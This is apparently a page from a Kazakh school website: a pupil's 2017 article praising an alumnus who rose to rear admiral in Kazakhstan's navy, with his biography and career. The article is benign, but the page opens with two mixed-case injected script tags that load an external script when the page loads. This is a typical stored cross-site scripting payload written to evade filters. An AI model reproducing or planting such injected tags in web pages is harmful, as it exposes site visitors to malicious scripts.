<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

16.11.2017

Ер атанған ел баласы

«Ел атағын ер шығарады» дегендей біздің Қарашілік ауылының атағын шығарып жүрген ағамыз, мектебіміздің  түлегі – Есенеев Қайыргелді Қайратұлы. Ауыл ішінен шығып, елінің, ата-анасының абыройын асқақтатқан ел баласы қазіргі таңда Қазақстан Республикасы  әскери – теңіз күшінің контр – адмиралы атағын иемденіп, ел мақтанышы болып отыр.

         Есенеев Қайыргелді Қайратұлы Көкшетау облысы, Щучье ауданының Шорс совхозында 1968 жылдың  7 тамызында дүние келді. 1975-1985 жылдар аралығында Қарашілік орта мектебін жақсы аяқтап, 1985-1990 жылдары Ленинград қаласындағы Ленин комсомолы атындағы жоғарғы әскери – теңіз училищесін үздік бітіріп, Мурманск облысындағы Полярный қаласында әскери – теңіз флотының командир қызметін атқарды. 1994 жылдары Қазақстан Республикасына ауысып, Маңғыстау облысындағы Ақтау қаласында  2000 жылға дейін әскери – теңіз бөлімінде қызмет жасады.

2000-2010 жылдар аралығында Қазақстан Республикасы корғану министрлігі Халықаралық қатынастар сферасында қызметін өтеді.

2013 жылы АҚШ – тың қорғану жөніндегі ұлтық университетіне оқуға түсіп, 2014  жылы халық қауіпсіздігі және стратегиялық ресурстарды қорғау жөніндегі магистр- ғалым атағымен аяқтап, Қазақстан Республикасы әскери-теңіз күштерінің басшысының бірінші орынбасары болып тағайындалды.

Биыл 2017 жылы ағамыз Қазақстан Республикасы әскери – теңіз күшінің контр – адмиралы атағына ие болды. Ол өз халқына адал қызмет жасап жүрген нағыз ер – азамат екендігін көрсетіп жүр.

Адмирал атағын көтеріп жүрген, ел сүйіспеншілігіне бөленген батыр ағамызды біз мақтан тұтамыз.

Шарипова Камила, 10-сынып оқушысы

Қарашілік орта мектебі

Просмотров: 498


Пікір қосу



Деректерді қолтаңбаға қосу